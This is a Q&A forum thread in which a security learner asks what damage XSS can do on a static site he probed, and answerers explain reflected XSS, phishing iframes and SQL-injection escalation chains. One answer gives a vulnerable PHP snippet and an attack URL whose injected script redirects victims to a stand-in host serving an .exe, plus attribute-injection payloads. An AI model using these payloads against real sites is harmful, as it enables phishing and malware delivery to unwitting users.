How to damage a website using XSS/SQL Injection?

Asked

Viewed 5,267 times

4

I’m no kind of hacker, but I know some techniques. I’m training security and I got really thoughtful about it. Every time I inject a script, it’s a alert(), nothing dangerous to the host (for example). I have no website, there would be no forwarding cookies. What is the big risk of an XSS failure on a site without DB/login system? I have a real site here (http://www.verinha.de/commentary_english.htm) which I found moving on the internet. Yes, it is a potential error, however, as the site has no login system, and I don’t know anything a black hat can do. What real "hackers/crackers" would do?

PS: To experience what I gave, I wrote <script>window.location = "https://www.google.com";</script>. I was forwarded to Google and returned to the page. Nothing happened.

php javascript sql xss sql-injection
  • 2

    SQL Injection on a site without BD does not exist. XSS technically exists (i.e., it may be possible to inject scripts), but attacks based on it depend on the script being persisted and run by other users of the site.

  • @bfavaretto About SQL I know, hehe. I mean, how to make appearance changes on a page, for example.

  • 3

    If you’re talking about a static website, you need server access to it.

  • In your examples you seem to me to be injecting only in your browser, and not on the site. This way you can not reach third parties, and there is no way to make an "attack", since the actions even passed through the network.

  • PS: Unless you used this to target someone who would use the same PC, most likely in the same browsing session... :)

2 answers

10


There’s no right way to explore that. Basically you need to understand who accesses the site and what the focus of users and often not just use a technique, for example:

Let’s assume that the users of the site in question have an account on the XPTO Site. You could create a redirect or iframe to a false page of the XPTO Site with a form and copy this data. As the user entered alone the Site that has the problem of XSS he will not think he is being fooled. Another example would be to include a redirect to an . exe for the purpose of attacking the user’s computer. This is commonly seen with bank or virtual wallet pages.

In this example XSS is not persistent, In other words, it is not saved inside the page, possibly there is no database. In this case the technique has to be adapted, it is common to pass the script through GET when the problem uses some form field. 

<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>

This is an example very similar to the site mentioned, the difference is that the information is passed through PHP GET and not through Javascript Prompt. In this case it would be enough to send users a link like

http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>

A variant of this technique was widely used at the time of Orkut, Google was already using login "Com conta Google" by default, but there was an additional parameter called redirect, many sent this url with a redirect to a file .exe or a página falsa de login. I know the problem was not related to XSS but I think worth mentioning.

On the website http://www.verinha.de there really is a problem with XSS, but when analyzing the source code you can see that the result is not stored anywhere, and that it is not possible to enter the value by the url. In general there is no application in this case, at least not using only this technique.

I hope I’ve complemented on something.

  • 1

    Remember also to be careful when making websites that allow images, just allow upload, because URL images are a potential risk, I could put the image URL as meusite.com/deletarMinhaConta.php for example, which wouldn’t be cool.

  • What would be an attack that could actually cause a problem on a server?

  • 1

    The most common is SQL Injection, which is quite common throughout the internet. But it is possible to increase the administrator privileges on the server using a simple upload system or get the login and root passwords of the server, search for RFI to understand better. But in general an attack follows the following line -> SQL Injection -> Access to administrative area with Upload System -> Sending infected file to server -> Privilege upgrade -> Attack to all server sites. Of course this is one of the most common things, but each case is a different case.

-2

You’d have to think of something like this: Let’s say you had a text box, to type something, as a username: 

User Name : <input ... value="Nome">

Now, if you typed like this:"onmouseover="event

<input ... value=" "onmouseover="evento ">

Or something like that: We have a text box, type of a browser, if we type such a thing, it can appear "No results found for [searched word]" And if we type: Code, and the browser or other site doesn’t find anything, if you don’t have any security, you can run the script. Let’s say this is HTML code:

<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div>

Example 2:

<script type="text/javascript">
function Pesquise(){
/*Script do navegador ou parte de pesquisa de um site*/
document.getElementById("Result").innerHTML  = "Não foi encontrado nenhum resultado para " +  document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>

Browser other questions tagged php javascript sql xss sql-injection

You are not signed in. Login or sign up in order to post.